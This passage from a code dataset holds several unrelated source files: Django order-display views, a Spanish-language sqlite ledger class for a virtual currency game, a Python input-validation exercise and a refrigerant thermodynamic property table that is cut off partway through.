live_orders2(request):\n today = date.today()\n oc_future_orders = CustomerOrder.objects.filter(delivery_date__gte=today, shipping_method__contains=\"Overnight\")\n la_future_orders = CustomerOrder.objects.filter(delivery_date__gte=today, shipping_method__contains=\"LA\")\n all_orders = CustomerOrder.objects.all()\n future_orders = CustomerOrder.objects.filter(delivery_date__gte=today)\n context = { \n 
\"all_orders\":all_orders, \n \"today\":today, \n \"future_orders\":future_orders,\n \"oc_future_orders\":oc_future_orders,\n \"la_future_orders\":la_future_orders,\n }\n return render(request, \"orderdisplay/live_orders2.html\", context)\n\ndef live_orders_oc(request):\n today = date.today()\n oc_future_orders = CustomerOrder.objects.filter(\n delivery_date__gte=today, shipping_method__contains=\"LA\")\n all_orders = CustomerOrder.objects.all()\n future_orders = CustomerOrder.objects.filter(delivery_date__gte=today)\n paginator = Paginator(future_orders, 25)\n page = request.GET.get('page')\n try:\n orders = paginator.page(page)\n except PageNotAnInteger:\n orders = paginator.page(1)\n except EmptyPage:\n orders = paginator.page(paginator.num_pages)\n context = { \n \"all_orders\":all_orders, \n \"today\":today, \n \"future_orders\":future_orders,\n \"oc_future_orders\":oc_future_orders,\n \"orders\":orders,\n }\n return render(request, \"orderdisplay/live_orders_oc.html\", context)\n\ndef live_orders_la(request):\n today = date.today()\n la_future_orders = CustomerOrder.objects.filter(\n delivery_date__gte=today, shipping_method__contains=\"LA\")\n all_orders = CustomerOrder.objects.all()\n future_orders = CustomerOrder.objects.filter(delivery_date__gte=today)\n context = { \n \"all_orders\":all_orders, \n \"today\":today, \n \"future_orders\":future_orders,\n \"la_future_orders\":la_future_orders,\n }\n return render(request, \"orderdisplay/live_orders_la.html\", context)\n\ndef note_save(request):\n note_save = request.POST[\"note_save\"]\n note_details = request.POST[\"note_detail_save\"]\n note = Note(note_text=note_save, note_detail=note_details)\n note.save()\n \n return HttpResponseRedirect('manager_post')\n \ndef note_details(request, note_id):\n note = Note.objects.get(id=note_id)\n context = { \"note\":note }\n return render(request, \"orderdisplay/note_details.html\", context) \n \ndef datatables(request):\n today = date.today()\n oc_future_orders = CustomerOrder.objects.filter(\n delivery_date__gte=today, shipping_method__contains=\"OC\")\n all_orders = CustomerOrder.objects.all()\n future_orders = CustomerOrder.objects.filter(delivery_date__gte=today)\n paginator = Paginator(future_orders, 25)\n page = request.GET.get('page')\n try:\n orders = paginator.page(page)\n except PageNotAnInteger:\n orders = paginator.page(1)\n except EmptyPage:\n orders = paginator.page(paginator.num_pages)\n context = { \n \"all_orders\":all_orders, \n \"today\":today, \n \"future_orders\":future_orders,\n \"oc_future_orders\":oc_future_orders,\n \"orders\":orders,\n }\n return render(request, \"orderdisplay/datatables.html\", context)\n \ndef datatables_products(request):\n all_products = Product.objects.all()[:200]\n\n context = {\n \"all_products\":all_products\n }\n \n\n return render(request, \"orderdisplay/datatables_products.html\", context)\n\ndef history(request):\n all_orders = CustomerOrder.objects.all()\n context = { \"all_orders\":all_orders }\n return render(request, \"orderdisplay/history.html\", context)\n \ndef register(request):\n return render(request, \"orderdisplay/register.html\")\n \ndef register_authenticate(request): \n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n password = request.POST[\"password\"]\n user = User.objects.create_user(username=username, email=email, password=password)\n \n if user is not None:\n user = authenticate(username=username, password=password)\n login(request, user)\n return 
HttpResponseRedirect(reverse('orderdisplay:dashboard')) \n else:\n return HttpResponseRedirect(reverse('orderdisplay:register')) \n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse('orderdisplay:dashboard')) \n \ndef map(request):\n all_orders = CustomerOrder.objects.all()\n all_orders5 = CustomerOrder.objects.all()[:5]\n context = { \"all_orders\":all_orders, \"all_orders5\":all_orders5 }\n return render(request, \"orderdisplay/map.html\", context)\n \ndef map2(request):\n points = CustomerOrder.objects.all()[:5]\n context = { \"points\":points }\n return render(request, \"orderdisplay/map2.html\", context)\n \ndef authenticate_user(request):\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(username=username, password=password)\n #return HttpResponse(user)\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse('orderdisplay:dashboard')) \n else:\n return HttpResponseRedirect(reverse('orderdisplay:login_invalid_view')) \n \ndef login_view(request):\n return render(request, 'orderdisplay/login.html')\n \ndef profile(request, user_id):\n user = User.objects.get(id=user_id)\n context = { \"user\":user }\n return render(request, 'orderdisplay/profile.html', context)\n \ndef login_invalid_view(request):\n return render(request, 'orderdisplay/login_invalid.html')\n \ndef js(request):\n return render(request, 'orderdisplay/js.html')\n \ndef test_json(request):\n theme_parks = [\"disneyland\", \"knotts\", \"universal\", \"magic mountain\"]\n days = [\"sunday\", \"saturday\"] # Goal: send days to JS\n theme_json = json.dumps(theme_parks) # serialize list to JSON\n return JsonResponse(theme_json, safe=False) # send JSON string in response\n \ndef price_chart(request):\n return HttpResponse(\"price chart page\")\n \ndef notifications(request):\n all_notes = Note.objects.order_by('-id')\n \n context = { \"all_notes\":all_notes }\n return render(request, 'orderdisplay/notifications.html', context)\n\ndef manager_post(request):\n all_notes = Note.objects.order_by('-id')[:5]\n context = { \"all_notes\":all_notes }\n return render(request, 'orderdisplay/manager_post.html', context)\n \ndef test(request):\n\n offset = [0, 7, 14, 21, 28]\n ordersum_list = []\n \n startdate = datetime.datetime.today()\n return HttpResponse(startdate)\n \ndef change(request):\n change_log = Change.objects.all().order_by('-created_at')\n context = { \"change_log\":change_log, }\n return render(request, 'orderdisplay/change.html', context)\n \ndef change_save(request):\n title = request.POST[\"title\"]\n body = request.POST[\"body\"]\n new = Change(title = title, body = body)\n new.save()\n return HttpResponseRedirect(\"/change\")\n \n# Hidden page with active edit links \ndef change_edit(request):\n change_log = Change.objects.all()\n context = { \"change_log\":change_log, } \n return render(request, 'orderdisplay/change_edit.html', context)\n \n# Gets change log entry and deletes \ndef change_delete(request, task_id):\n task = Change.objects.get(id=task_id)\n task.delete()\n return HttpResponseRedirect(\"/change_edit\")\n \ndef customer(request):\n all_customers = Customer.objects.all()\n context = { \"all_customers\":all_customers }\n return render(request, \"orderdisplay/customer.html\", context)\n \ndef morris(request):\n context = {}\n return render(request, \"orderdisplay/morris.html\", context)\n\n# Delete\n\ndef page_one(request):\n customers = Customer.objects.all()[:10]\n context = { 
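# --- editor's sketch (hypothetical view, not part of the original file) ---
# test_json above serializes the list with json.dumps() and then hands the
# resulting *string* to JsonResponse, which JSON-encodes it a second time,
# so clients receive a quoted string rather than a JSON array. Passing the
# list itself serializes it exactly once:
def test_json_fixed(request):
    theme_parks = ["disneyland", "knotts", "universal", "magic mountain"]
    return JsonResponse(theme_parks, safe=False)  # safe=False allows non-dict
# --- end sketch ---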
\"customers\":customers }\n return render(request, 'orderdisplay/page_one.html', context)\n\n\ndef page_two(request):\n search = request.POST['search']\n superheroes = Customer.objects.filter(first_name__startswith=search)\n context = { \"superheroes\":superheroes, \"search\":search }\n return render(request, 'orderdisplay/page_two.html', context)","sub_path":"orderdisplay/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"56185362","text":"import time\nfrom datetime import datetime\nimport sqlite3\nimport operator\nimport random\nimport string\n\nclass HuachiNet():\n \"\"\"Huachicol as a service\n ---------------------------------\n Requiere nombre de usuario para obtener la siguiente informacion:\n -Saldo total\n -Historial de movimientos (Global,Depositos,Retiros)\n\n El usuario puede realizar las siguientes funciones dentro de la red:\n \n -Bono_Bienvenida\n -Verificar_Usuario\n -Enviar_Bineros\n\n *Si el usuario no existe en la BD, se regresa None como valor\n \"\"\"\n\n def __init__(self,usuario):\n #Conexion a BD\n self.conn = sqlite3.connect(\"boveda.sqlite3\")\n self.cursor = self.conn.cursor()\n self.id = usuario\n self.perk, self.power, self.trait, self.weapon = self.Consultar_Perks()\n self.saldo_total = self.Consultar_Saldo()\n self.historial = self.Historial_Cuenta()\n self.depositos = self.Historial_Cuenta(tipo_movimiento=\"Deposito\")\n self.retiros = self.Historial_Cuenta(tipo_movimiento=\"Retiro\")\n self.asaltos = self.Historial_Cuenta(tipo_movimiento=\"Asalto\")\n self.huachitos = self.Historial_Cuenta(tipo_movimiento=\"Huachito\")\n self.premios_huachito = self.Historial_Cuenta(tipo_movimiento=\"Premio Huachito\")\n self.atracos = self.Historial_Cuenta(tipo_movimiento=\"Atraco\")\n self.levantones = self.Historial_Cuenta(tipo_movimiento=\"Levanton\")\n\n\n def Bono_Bienvenida(self,usuario):\n \"\"\"Entregar bineros a los clientes nuevos\"\"\"\n\n query = \"\"\"INSERT INTO transacciones (timestamp,usuario,cantidad,nota,origen_destino) VALUES (?,?,?,?,?)\"\"\"\n\n timestamp = time.time()\n\n try: \n self.cursor.execute(query,(timestamp,usuario,1000,\"Bono Inicial\",\"Bodega\"))\n\n self.cursor.execute(query,(timestamp,\"Bodega\",-1000,\"Retiro\",usuario))\n\n self.conn.commit()\n\n except Exception as e:\n print(f'----\\n{e}')\n \n def Verificar_Usuario(self,usuario):\n \"\"\"Verificar si existe el cliente en la BD\"\"\"\n\n existe = False\n\n query = \"\"\"SELECT ID FROM transacciones WHERE usuario=? 
LIMIT 1\"\"\"\n\n try:\n self.cursor\n\n resultado = self.cursor.execute(query,(usuario,)).fetchone()\n\n if resultado != None:\n\n existe = True\n\n except Exception as e:\n print(f'----\\n{e}')\n\n return existe\n\n def Enviar_Bineros(self,usuario,cantidad,nota=\"Default\"):\n \"\"\"Registrar transacciones de bineros\"\"\"\n \n query = \"\"\"INSERT INTO transacciones (timestamp,usuario,cantidad,nota,origen_destino) VALUES (?,?,?,?,?)\"\"\"\n\n timestamp = time.time()\n\n try:\n if nota == \"Default\":\n\n self.cursor.execute(query,(timestamp,usuario,cantidad,\"Deposito\",self.id))\n\n negativo = cantidad - (cantidad * 2)\n\n self.cursor.execute(query,(timestamp,self.id,negativo,\"Retiro\",usuario))\n\n self.conn.commit()\n\n elif nota != \"Default\":\n\n self.cursor.execute(query,(timestamp,usuario,cantidad,nota,self.id))\n\n negativo = cantidad - (cantidad * 2)\n\n self.cursor.execute(query,(timestamp,self.id,negativo,nota,usuario))\n\n self.conn.commit()\n\n except Exception as e:\n print(f'----\\n{e}')\n\n def Consultar_Saldo(self):\n \"\"\"Consulta el saldo total del cliente\"\"\"\n\n query = \"\"\"SELECT SUM(cantidad) FROM transacciones WHERE usuario=?\"\"\"\n\n try:\n self.cursor.execute(query,(self.id,))\n\n resultado = self.cursor.fetchone()\n\n return resultado[0]\n \n except Exception as e:\n print(f'----\\n{e}') \n \n def Historial_Cuenta(self, tipo_movimiento = \"Global\"):\n \"\"\"Consultar historial de movimientos del cliente desde el inicio de la cuenta\"\"\"\n try:\n if tipo_movimiento == \"Global\":\n query = \"\"\"SELECT id,timestamp,cantidad,nota,origen_destino FROM transacciones WHERE usuario=? ORDER BY id DESC\"\"\"\n parametros = (self.id,)\n\n else:\n query = \"\"\"SELECT id,timestamp,cantidad,origen_destino FROM transacciones WHERE usuario=? AND nota=? 
ORDER BY id DESC\"\"\"\n parametros = (self.id,tipo_movimiento)\n\n self.cursor.execute(query,parametros)\n\n resultado = self.cursor.fetchall()\n\n return resultado\n \n except Exception as e:\n print(f'----\\n{e}')\n \n \n def Mujicanos(self):\n \"\"\"Lista de usuarios activos\"\"\"\n\n #Obtener lista de usuarios\n query = \"\"\"SELECT usuario FROM transacciones WHERE nota='Bono Inicial'\"\"\"\n\n self.cursor.row_factory = lambda cursor, row: row[0]\n\n resultado = self.cursor.execute(query).fetchall()\n\n return list(filter(None,resultado))\n\n def Ranking(self):\n \"\"\"Forbes Mujico - Usuarios Abinerados\"\"\"\n\n #Obtener lista de usuarios\n query = \"\"\"SELECT usuario, SUM(cantidad) as cantidad FROM transacciones WHERE usuario in (SELECT usuario FROM transacciones WHERE nota='Bono Inicial') GROUP BY usuario ORDER BY cantidad DESC\"\"\"\n \n return self.cursor.execute(query).fetchall()\n\n def Huachiclave(self):\n \"\"\"Regresa la huachiclave vigente o genera una nueva\"\"\"\n\n query = \"\"\"SELECT timestamp,huachiclave,cantidad,entregado FROM huachilate WHERE entregado = '0' ORDER BY timestamp\"\"\"\n\n query2 = \"\"\"INSERT INTO huachilate (timestamp,huachiclave,cantidad,entregado) VALUES (?,?,?,?)\"\"\"\n\n resultado = self.cursor.execute(query).fetchall()\n\n if resultado == []:\n \n timestamp = time.time()\n \n huachiclave = \"\".join(random.choices(string.ascii_letters + string.digits,k = 7))\n\n cantidad = random.randint(5000,50000)\n\n self.cursor.execute(query2,(timestamp,huachiclave,cantidad,0))\n\n self.conn.commit()\n\n return (timestamp,huachiclave,cantidad)\n \n else:\n return resultado[-1]\n\n def Consultar_Perks(self):\n \"\"\"Consultar perk, power, trait y arma\"\"\"\n\n query = \"\"\"SELECT perk,power,trait,weapon FROM perks WHERE usuario = ?\"\"\"\n\n resultado = self.cursor.execute(query,(self.id,)).fetchall()\n\n #En caso de que el usuario no este en la tabla de perks, se añadira con stats basicos.\n if resultado == []:\n\n timestamp = time.time()\n \n query2 = \"\"\"INSERT INTO perks (timestamp,usuario,perk,power,trait,weapon) VALUES (?,?,?,?,?,?)\"\"\"\n\n self.cursor.execute(query2,(timestamp,self.id,\"Normal\",100,\"Normal\",\"Navaja\"))\n\n self.conn.commit()\n\n return (\"Normal\",100,\"Normal\",\"Navaja\")\n\n else:\n\n return resultado[-1]\n\n def Update_Perks(self,clase,item):\n \"\"\"Agregar y modificar perk,trait y weapon de los mujicanos\"\"\"\n\n query = f\"\"\"UPDATE perks SET {clase} = ? WHERE usuario = ?\"\"\"\n\n query2 = \"\"\"UPDATE perks SET power = 100 WHERE usuario = ?\"\"\"\n\n self.cursor.execute(query,(item,self.id))\n\n if clase == \"perk\":\n self.cursor.execute(query2,(self.id,))\n\n self.conn.commit()\n\n def Consumir_Energia(self,cantidad):\n \"\"\"Los perks necesitan energia para funcionar\"\"\"\n\n energia = self.power - cantidad\n\n query = \"\"\"UPDATE perks SET power = ? 
WHERE usuario = ?\"\"\"\n\n self.cursor.execute(query,(energia,self.id))\n\n self.conn.commit()\n\n\n \n\n","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":7605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"625704301","text":"# 10-6 加法运算:提示用户提供数值输入时,常出现的一个问题是,用户提供的是文本而不是数字。\n# 在这种情况下,当你尝试将输入转换为整数时,将引发TypeError 异常。\n# 编写一个程序,提示用户输入两个数字,再将它们相加并打印结果。在用户输入的任何一个值不是数字时都捕获TypeError 异常,\n# 并打印一条友好的错误消息。对你编写的程序进行测试:先输入两个数字,再输入一些文本而不是数字。\n\nprint('Input 2 numbers,')\ntry:\n first_num = input('Input the first number here: ')\n first_num = int(first_num)\n second_num = input('Input the second number here:')\n second_num = int(second_num)\n print(first_num + second_num)\nexcept ValueError:\n print('ERROR! Please input number!')\n","sub_path":"CH_10/10_6.py","file_name":"10_6.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"615719343","text":"# Python Import ==================\nimport math,sys\n\n# User Import\n#from Data import Data\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - \n# Job \t\t\t:\n#\n# Editor\t\t: aymhenry@gmail.com\n# - - - - - - - - - - - - - - - - - - - - - - - - - \n#-- PROPERTY ROUTINES REFERENCED:\n#-- bconst\tinitializes arrays of property coefficients\n#-- bublp\tsaturation properties at given pressure\n#-- bublt\tsaturation properties at given temperature\n#-- entrop\tmolar entropy\n#-- espar\tset up coefficients for equation of state\n#-- hcvcps\tmolar enthalpy and heat capacity\n#-- hpin\ttemperature, quality, etc. as a function of enthalpy and pressure\n#-- spin\ttemperature, quality, etc. as a function of entropy and temperature\n#-- vit\t\tcalculate specifi volume\n\nclass BData:\n\t#=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.==.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=\n\t#--\n\t#-- THIS ROUTINE INITIALIZES THE COMMON BLOCKS CONTAINING INFORMATION\n\t#-- ABOUT THE PURE COMPONENTS. 
IT IS NOT REFERENCED DIRECTLY BY ANY\n\t#-- OTHER SUBROUTINE BUT MUST BE INCLUDED IN THE EXECUTABLE ELEMENT.\n\t#-- DATA ARRAYS ARE DIMENSIONED TO ACCOMODATE ADDITIONAL\n\t#-- PURE COMPONENTS.\n\t#--\n\t#-- EXPLANATION OF CONSTANTS:\n\t#-- COEFF(I,J) - FOR REFRIGERANT J, COEFFICIENTS OF A, B, CP0\n\t#-- CURVE FITS:\n\t#-- A = A0 * EXP(A1*T + A2*T*T) (KJ M**3/KMOL**2)\n\t#-- B = B0 + B1*T + B2*T*T (M**3/KMOL)\n\t#-- CP0 = C0 + C1*T + C2*T*T (KJ/KMOL K)\n\t#-- (STORED IN ORDER A0,A1,A2,B0,B1,B2,C0,C1,C2)\n\t#-- CRIT(I,J) - FOLLOWING INFORMATION FOR REFRIGERANT J:\n\t#-- I = 1 - MOLECULAR WEIGHT\n\t#-- 2 - REFERENCE TEMPERATURE FOR ENTHALPY AND ENTROPY (K)\n\t#-- 3 - CRITICAL TEMPERATURE (K)\n\t#-- 4 - CRITICAL PRESSURE (KPA)\n\t#-- 5 - CRITICAL VOLUME (M**3/KMOL)\n\t#-- HREF(J) - REFRIGERANT NAME (ASHRAE DESIGNATION)\n\t#-- HZERO(J) - VALUE OF SATURATED LIQUID ENTHALPY OF REFRIGERANT\n\t#-- J AT ITS REFERENCE TEMPERATURE (KJ/KMOL)\n\t#-- SZERO(J) - VALUE OF SATURATED LIQUID ENTROPY AT REFERENCE\n\t#-- TEMPERATURE (KJ/KMOL K)\n\t#-- R - GAS CONSTANT (KJ/KMOL K)\n\t#-- TOLR - RELATIVE CONVERGENCE TOLERANCE FOR ITERATION LOOPS\n\t#-- SHOULD BE AT LEAST 10 TIMES LARGER THAN MACHINE PRECISION\n\t#-- ITMAX - MAXIMUM ITERATION COUNT FOR ITERATIVE LOOPS\n\t#-- LUP - LOGICAL UNIT TO WHICH ANY WARNING MESSAGES ARE WRITTEN\n\t#--\n\t#-- A, B COEFFFICIENTS EVALUATED FROM ASHRAE (1981) SATURATION\n\t#-- DATA UNLESS INDICATED.\n\t#--\n\t#-- DATA VALUES UPDATED ON 3/15/94 TO BE CONSISTENT WITH REFPROP 4.0\n\t#--\n\t#-- REFRIGERANTS NOW ARE:\n\t#-- 1: R11 2: R12 3: R13 4: n-C5 5: R14 6: R22\n\t#-- 7: R23 8: R113 9: R114 10: R142B 11: R152A 12: R216A\n\t#-- 13: R125 14: R143A 15: R134A 16: R123 17: RC318 18: R134\n\t#-- 19: RC270 20: R141B 21: i-C5 22: R290 23: R600 24: R600A\n\t#-- 25: R32 26: R1270 27: R124 28: R115 29: CE-216 30: E-125\n\t#-- 31: R123A 32: R143 33: R218 34: E134\n\t#--\n\t#-- NOTE: REFPROP 4.0 ALLOWS USE OF A MODIFIED B-W-R EQUATION OF STATE FOR\n\t#-- R32, R123, R124, R125, AND R134A AS PURE FULIDS. THE CSD EQUATION\n\t#-- OF STATE IS USED BY REFPROP FOR MIXTURES.\n\t#--\n\t#-- NOTE: THE FOLLOWING REFRIGERANTS WERE FIT WITH THE OLDER REFPROP (3.0)\n\t#-- COEFFICIENTS (BECAUSE OF A BETTER MATCH TO ASHRAE DATA OVER THE\n\t#-- -20 F TO + 130 F TEMPERATURE RANGE): R114\n\t#--\n\t#-- NOTE: THE COEFFICIENTS FOR R12 ARE THE SAME AS USED IN REFPROP 3.O TO\n\t#-- PROVIDE CONSISTENCY WITH EARLIER ANALYSES. THE REFPROP 4.0\n\t#-- COEFFICIENTS CHANGE THE ENERGY BY ABOUT 0.001 KWH/DAY. 
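# --- editor's sketch (hypothetical helper, not part of the original file) ---
# The COEFF rows documented above encode three curve fits per refrigerant;
# evaluated at a temperature T (K) they give A (kJ m**3/kmol**2),
# B (m**3/kmol) and CP0 (kJ/kmol K), exactly as espar does further below:
def curve_fits(coeff, T):
    # coeff is one 9-element COEFF row: A0,A1,A2,B0,B1,B2,C0,C1,C2
    a0, a1, a2, b0, b1, b2, c0, c1, c2 = coeff
    A = a0 * math.exp((a1 + a2 * T) * T)   # A = A0*EXP(A1*T + A2*T*T)
    B = b0 + (b1 + b2 * T) * T             # B = B0 + B1*T + B2*T*T
    CP0 = c0 + (c1 + c2 * T) * T           # CP0 = C0 + C1*T + C2*T*T
    return A, B, CP0
# --- end sketch ---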
IT IS NOT\n\t#-- WORTH EXPLAINING AWAY DIFFERENCES BETWEEN THE RESULTS IN THE ERA\n\t#-- DOCUMENTATION AND A REVISED ERA USING THE REFPROP 4.O COEFFICIENTS\n\t#-- FOR R12.\t\n\t\n\n\t#-- Common HREF1 group ---------------------------------\n\tHREF = [] #[[\" \"] * (34+1)]\t\t# CHARACTER*6 HREF(34),REFH(34)\n\tREFH = [] #[[\" \"] * (34+1)]\n\t\n\t#-- Common ESDATA group ---------------------------------\n\tCOEFF = []\t\n\tCRIT = [] \n\n\t#-- Common HSZERO group ---------------------------------\n\tHZERO = [0.0] * (34+1)\n\tSZERO = [0.0] * (34+1)\n\n\t#-- Common REF group ---------------------------------\n\tTREF= [0.0] * (5+1)\n\tHR = [0.0] * (5+1)\n\tSR = [0.0] * (5+1)\n\tVR = [0.0] * (5+1)\n\t\n\t#-- Common RDATA2 group ---------------------------------\n\tWM = [0.0] * (5+1)\n\tTC = [0.0] * (5+1) \n\n\t#-- Common ESPAR1 group ---------------------------------\n\tF = [[0.0] * (5+1) for i in range(5+1)]\t# array(Rows, Cols) = [[0] * Cols for i in range(Rows)]\n\tAP = [0.0] * (5+1)\n\tBP = [0.0] * (5+1)\n\tDADT = 0.0; DBDT = 0.0; D2ADT= 0.0; D2BDT = 0.0\n\t\n\t#-- Common CPDATA group ---------------------------------\n\t# Create zero base array\n\tC = [[0.0] * (2+1) for i in range(5+1)]\t# array(Rows, Cols) = [[0] * Cols for i in range(Rows)]\n\n\t#-- Common RDATA1 group ---------------------------------\n\t# Create zero base array\n\tA = [[0.0] * (2+1) for i in range(5+1)]\t# array(Rows, Cols) = [[0] * Cols for i in range(Rows)]\n\tB = [[0.0] * (2+1) for i in range(5+1)]\t# array(Rows, Cols) = [[0] * Cols for i in range(Rows)]\n\n\t#-- Common RDATA4 group --------------------------------\n\tR = 8.314\n\t\n\t#-- Common TOL group ----------------------------------\n\tTOLR = 1.0E-7*10 # SHOULD BE AT LEAST 10 TIMES LARGER THAN MACHINE PRECISION\n\tITMAX = 20\n\tLUP = 9\n\n\t#-- Common HSPURE group ---------------------------------\n\tHP = [0.0] * (5+1)\n\tSP = [0.0] * (5+1)\n\tCP = [0.0] * (5+1)\n\n\t#-- Common TOLSH group ----------------------------------\n\tTOLH = 0.010\n\tTOLS = 0.001\n\t\n\t@staticmethod\n\tdef setup():\n\t\t# Ref 00\n\t\t# add one more Col and Row, to keep FORTRAN none zero Ref.\n\t\tBData.HREF.append (\" \")\n\t\tBData.REFH.append (\" \")\n\t\t\n\t\t#-- zero based BData.CRIT.append ([0.0] * 5)\n\t\t#-- zero based BData.COEFF.append ([0.0] * 9)\n\t\t#---------------------------------------\n\t\t# Ref 01\n\t\t# R11, TRICHLOROFLUOROMETHANE (CFCL3)\n\t\t#\n\t\tBData.HREF.append (\"R11\")\n\t\tBData.REFH.append (\" R11\")\n\t\t\n\t\tBData.CRIT.append ([137.37, 296.91, 471.2, 4467.0, 0.247])\n\t\t\n\t\tBData.COEFF.append ([ 4967.07, -2.23098E-3, -5.59203E-7,\t\t\\\n\t\t\t\t\t 0.178148, -1.82363E-4, -2.54131E-8,\t\\\n\t\t\t\t\t 23.4805, 0.251072, -2.28722E-4 ])\n\n\t\t# Ref 02\n\t\t# R12, DICHLORODIFLUOROMETHANE (CF2CL2)\n\t\t#\n\t\tBData.HREF.append (\"R12\")\n\t\tBData.REFH.append (\" R12\")\n\t\t\n\t\tBData.CRIT.append ([120.91, 243.39, 384.95, 4180.0, 0.241]) # error last item fixed (was 0.181)\n\t\tBData.COEFF.append ([ 3819.88, -3.31988E-3, 2.41944E-7,\t\\\n\t\t\t\t\t 0.165350, -2.65758E-4, 9.13878E-8,\t\\\n\t\t\t\t\t 18.4874, 0.241782, -2.04594E-4])\n\t\t# Ref 03\n\t\t# R13, CHLOROTRIFLUOROMETHANE (CF3CL)\n\t\t#\n\t\tBData.HREF.append (\"R13\")\n\t\tBData.REFH.append (\" R13\")\n\t\t\n\t\tBData.CRIT.append ([104.46, 191.67, 302.0, 3870.0, 0.181])\n\t\tBData.COEFF.append([ 2157.20, -2.84478E-3, -2.75122E-6,\t\\\n\t\t\t\t\t 0.129485, -1.93746E-4, -9.01119E-8,\t\\\n\t\t\t\t\t 13.8691, 0.232370, -1.83095E-4 ])\n\t\t# Ref 04\n\t\t# n-C5, n-Pentane 
(C5H12)\n\t\t#\n\t\tBData.HREF.append (\"n-C5\")\n\t\tBData.REFH.append (\" n-C5\")\n\t\tBData.CRIT.append ([72.15, 309.34, 469.5, 3359.9, 0.295])\n\t\tBData.COEFF.append ([6745.80, -2.29793E-3, -0.70747E-6,\t\\\n\t\t\t 0.228716, -2.36350E-4, -0.32793E-7,\t\\\n\t\t\t 54.7577, 0.143042, 2.53720E-4 ])\n\t\t \n\t\t# Ref 05\n\t\t# R14, TETRAFLUOROMETHANE (CF4)\n\t\t#\n\t\tBData.HREF.append (\"R14\")\n\t\tBData.REFH.append (\" R14\")\n\t\tBData.CRIT.append ([88.00, 145.17, 227.5, 3795.0, 0.141])\n\t\tBData.COEFF.append ([ 1272.41, -3.42946E-3, -6.47573E-6,\t\\\n\t\t\t 0.099664, -1.57113E-4, -2.95020E-7,\t\\\n\t\t\t 14.4296, 0.184530, -9.51890E-5 ])\n\t\t# Ref 06\n\t\t# R22, CHLORODIFLUOROMETHANE (CHF2CL)\n\t\t#\n\t\tBData.HREF.append (\"R22\")\n\t\tBData.REFH.append (\" R22\")\n\t\tBData.CRIT.append ( [86.47, 232.29, 369.3, 5054.0, 0.169 ] )\n\n\t\tBData.COEFF.append ([2624.62, -2.67304E-3, -1.33238E-6,\t\\\n\t\t\t 0.117395, -1.40272E-4, -0.52161E-7,\t\\\n\t\t\t 21.9839, 0.127744, -4.78872E-5 ] )\n\t\t# Ref 07\n\t\t# R23, TRIFLUOROMETHANE (CHF3)\n\t\t#\n\t\tBData.HREF.append (\"R23\")\n\t\tBData.REFH.append (\" R23\")\n\t\tBData.CRIT.append ( [70.01, 191.12, 299.1, 4900.0, 0.133 ] )\n\n\t\tBData.COEFF.append ( [ 1743.89, -3.52595E-3, -1.12774E-6,\n\t\t\t 0.090205, -1.25602E-4, -0.50675E-7,\n\t\t\t 23.6029, 0.082287, 3.18265E-5 ] )\n\t\t# Ref 08\n\t\t# R113, 1,1,2-TRICHLOROTRIFLUOROETHANE (CF2CL-CFCL2)\n\t\t#\n\t\tBData.HREF.append (\"R113\")\n\t\tBData.REFH.append (\" R113\")\n\t\tBData.CRIT.append ( [ 187.38, 320.80, 487.5, 3456.0, 0.329 ] )\n\n\t\tBData.COEFF.append ( [ 7284.48, -2.15870E-3, -8.03754E-7,\t\t\\\n\t\t\t 0.234712, -2.11131E-4, -7.33758E-8,\t\t\\\n\t\t\t 76.2637, 0.119641, 7.18786E-5 ] )\n\t\t# Ref 09\n\t\t# R114, 1,2-DICHLOROTETRAFLUOROETHANE (CF2CL-CF2CL): Version 3.0 Refprop\n\t\t#\n\t\tBData.HREF.append (\"R114\")\n\t\tBData.REFH.append (\" R114\")\n\t\tBData.CRIT.append ( [ 170.92, 276.80, 418.80, 3248.0, 0.307 ] )\n\n\t\tBData.COEFF.append ( [ 5929.74, -2.86018E-3, -4.81520E-7,\t\t\\\n\t\t\t 0.221874, -2.88304E-4, 1.81892E-8,\t\t\\\n\t\t\t 37.2482, 0.337339, -2.39995E-4 ] )\n\t\t \n\t\t# Ref 10\n\t\t# R142B, 1-CHLORO-1,1-DIFLUOROETHANE (CF2CL-CH3)\n\t\t#\n\t\tBData.HREF.append (\"R142B\")\n\t\tBData.REFH.append (\" R142B\")\n\t\tBData.CRIT.append ( [100.49, 264.01, 410.3, 4120.0, 0.231 ] )\n\n\t\tBData.COEFF.append ( [ 4180.75, -2.73043E-3, -5.43638E-7,\t\t\\\n\t\t\t 0.169138, -2.41068E-4, 0.67566E-7,\t\t\\\n\t\t\t 16.3914, 0.271719, -1.58933E-4 ] )\n\t\t# Ref 11\n\t\t# R152A, 1,1-DIFLUOROETHANE (CHF2-CH3)\n\t\t#\n\t\tBData.HREF.append (\"R152A\")\n\t\tBData.REFH.append (\" R152A\")\n\t\tBData.CRIT.append ( [ 66.05, 248.50, 386.7, 4492.0, 0.181 ] )\n\n\t\tBData.COEFF.append ( [3198.63, -2.96134E-3, -0.32190E-6,\t\t\\\n\t\t\t 0.133264, -2.03633E-4, 0.777251E-7,\t\t\\\n\t\t\t 22.2832, 0.153987, -3.015434E-6 ] )\n\t\t# Ref 12\n\t\t# R216A, 1,3-DICHLOROHEXAFLUOROPROPANE [NOT IN REFPROP4.0]\n\t\t#\n\t\tBData.HREF.append (\"R216A\")\n\t\tBData.REFH.append (\" R216A\")\n\t\tBData.CRIT.append ( [ 220.93, 233.15, 453.14, 2754.1, 0.3847 ] )\n\n\t\tBData.COEFF.append ( [ 8431.44, -2.45916E-3, -9.91754E-7,\t\t\\\n\t\t\t 0.265720, -2.20418E-4, -1.68111E-7,\t\t\\\n\t\t\t 8.79769, 0.654246, -5.39923E-4 ] )\n\t\t# Ref 13\n\t\t# R125, 